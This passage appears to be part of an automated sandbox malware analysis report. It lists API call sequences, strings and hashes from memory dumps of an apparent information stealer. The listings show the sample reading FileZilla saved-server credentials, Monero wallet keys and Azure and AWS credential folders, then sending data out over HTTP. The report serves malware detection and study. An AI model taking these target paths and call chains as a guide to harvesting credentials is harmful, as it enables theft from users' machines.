                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00E60DBA,00E60DB7,00E60DB6,00E60DB3), ref: 00E50362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E50369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E50385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E503CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E503DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00E50419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E50463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E50532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E50562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00E50571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00E50580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E50593
                                  • lstrcat.KERNEL32(?,00E61678), ref: 00E505A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E505B5
                                  • lstrcat.KERNEL32(?,00E6167C), ref: 00E505C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00E505D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E505E6
                                  • lstrcat.KERNEL32(?,00E61688), ref: 00E505F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00E50604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E50617
                                  • lstrcat.KERNEL32(?,00E61698), ref: 00E50626
                                  • lstrcat.KERNEL32(?,00E6169C), ref: 00E50635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB2), ref: 00E5068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 158b4186e753383151227316240b6a635da4fb72bb4e5063bc8905313fe77f0c
                                  • Instruction ID: 521a6d7f2293f651207f73c0d74c42be301d27a8261a66c52fc0a2a270c0f689
                                  • Opcode Fuzzy Hash: 158b4186e753383151227316240b6a635da4fb72bb4e5063bc8905313fe77f0c
                                  • Instruction Fuzzy Hash: 2ED13071910208ABCB04EBE0DD9ADEE7778BF14301F545929F542B7085EF79AA09CB61
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E459F8
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E45A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E45B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01CBF3B8,00000000,?,01CBAF70,00000000,?,00E61A1C), ref: 00E45E71
                                  • lstrlen.KERNEL32(00000000), ref: 00E45E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E45E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E45E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00E45EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00E45ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E45EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00E45F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E45F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E45F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FBD
                                  • HttpOpenRequestA.WININET(00000000,01CBF398,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E45BF8
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00E45FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 178b632205b1345442e10fd074c3fe0eb37cf355193b6ab8417ca4d8b8ab9ed3
                                  • Instruction ID: 68a26d256ef43098accc8bfee2558d5e5146c3bb55b5eec61b62fa6a6a9a04ac
                                  • Opcode Fuzzy Hash: 178b632205b1345442e10fd074c3fe0eb37cf355193b6ab8417ca4d8b8ab9ed3
                                  • Instruction Fuzzy Hash: 84122272920128ABCB19EBA0DC99FDE73B8BF54701F4456A9B50673091EF342A4DCF61
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E4D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D208
                                  • lstrcat.KERNEL32(?,00E61478), ref: 00E4D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D22A
                                  • lstrcat.KERNEL32(?,00E6147C), ref: 00E4D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D24C
                                  • lstrcat.KERNEL32(?,00E61480), ref: 00E4D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D26E
                                  • lstrcat.KERNEL32(?,00E61484), ref: 00E4D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D290
                                  • lstrcat.KERNEL32(?,00E61488), ref: 00E4D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D2B2
                                  • lstrcat.KERNEL32(?,00E6148C), ref: 00E4D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E4D2D4
                                  • lstrcat.KERNEL32(?,00E61490), ref: 00E4D2E3
                                    • Part of subcall function 00E5A820: lstrlen.KERNEL32(00E44F05,?,?,00E44F05,00E60DDE), ref: 00E5A82B
                                    • Part of subcall function 00E5A820: lstrcpy.KERNEL32(00E60DDE,00000000), ref: 00E5A885
                                  • lstrlen.KERNEL32(?), ref: 00E4D32A
                                  • lstrlen.KERNEL32(?), ref: 00E4D339
                                    • Part of subcall function 00E5AA70: StrCmpCA.SHLWAPI(01CB9A70,00E4A7A7,?,00E4A7A7,01CB9A70), ref: 00E5AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 09402192f8ad6a94aa5ca325f13207043df07a692e2645a635b25c346026f214
                                  • Instruction ID: b3523f6e01151d9e381b082f7b2c25befd35222547ea87bee25babe337e8d9e7
                                  • Opcode Fuzzy Hash: 09402192f8ad6a94aa5ca325f13207043df07a692e2645a635b25c346026f214
                                  • Instruction Fuzzy Hash: 94E18472910108DBCB18EBA0DD96EEE73B8BF54301F145669F543B3091EE39AE09CB61
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01CBDD70,00000000,?,00E6144C,00000000,?,?), ref: 00E4CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E4CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00E4CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E4CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E4CAD9
                                  • StrStrA.SHLWAPI(?,01CBDBF0,00E60B52), ref: 00E4CAF7
                                  • StrStrA.SHLWAPI(00000000,01CBDD88), ref: 00E4CB1E
                                  • StrStrA.SHLWAPI(?,01CBDEF8,00000000,?,00E61458,00000000,?,00000000,00000000,?,01CB9B20,00000000,?,00E61454,00000000,?), ref: 00E4CCA2
                                  • StrStrA.SHLWAPI(00000000,01CBDE98), ref: 00E4CCB9
                                    • Part of subcall function 00E4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C871
                                    • Part of subcall function 00E4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C87C
                                  • StrStrA.SHLWAPI(?,01CBDE98,00000000,?,00E6145C,00000000,?,00000000,01CB99D0), ref: 00E4CD5A
                                  • StrStrA.SHLWAPI(00000000,01CB97C0), ref: 00E4CD71
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B46), ref: 00E4C943
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B47), ref: 00E4C957
                                    • Part of subcall function 00E4C820: lstrcat.KERNEL32(?,00E60B4E), ref: 00E4C978
                                  • lstrlen.KERNEL32(00000000), ref: 00E4CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00E4CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 351abde6a7355e8e041adc1d580ffe10ebdb125e3daa4733bbca1c0547b87584
                                  • Instruction ID: 3fe701b8d5d485de6b1f8dbe052fc45d4ef5638cb3ce3937ab4fd8fc01045479
                                  • Opcode Fuzzy Hash: 351abde6a7355e8e041adc1d580ffe10ebdb125e3daa4733bbca1c0547b87584
                                  • Instruction Fuzzy Hash: EFE14D72900108ABDB18EBA0DC96FEEB7B8BF54301F045669F54673191EF346A4ECB61
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,01CBBD40,00000000,00020019,00000000,00E605B6), ref: 00E583A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E58426
                                  • wsprintfA.USER32 ref: 00E58459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58499
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 794bfc436cebcc9308199b0634c6bee44d8d021ef1a93fef597c2ed4e00a399c
                                  • Instruction ID: f7469c77319e6e46fbc666a2119afef7000b0911b6efd3a5c6b2c93b182a8961
                                  • Opcode Fuzzy Hash: 794bfc436cebcc9308199b0634c6bee44d8d021ef1a93fef597c2ed4e00a399c
                                  • Instruction Fuzzy Hash: 28812BB1910118EBDB28DF50CD95FEAB7B8BF48701F008699E549B6140DF756B89CFA0
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00E54DCD
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E5492C
                                    • Part of subcall function 00E54910: FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00E54E59
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                    • Part of subcall function 00E54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                    • Part of subcall function 00E54910: FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E54EE5
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E549B0
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E608D2), ref: 00E549C5
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E549E2
                                    • Part of subcall function 00E54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E54A1E
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,01CBF258), ref: 00E54A4A
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,00E60FF8), ref: 00E54A5C
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,?), ref: 00E54A70
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,00E60FFC), ref: 00E54A82
                                    • Part of subcall function 00E54910: lstrcat.KERNEL32(?,?), ref: 00E54A96
                                    • Part of subcall function 00E54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E54AAC
                                    • Part of subcall function 00E54910: DeleteFileA.KERNEL32(?), ref: 00E54B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
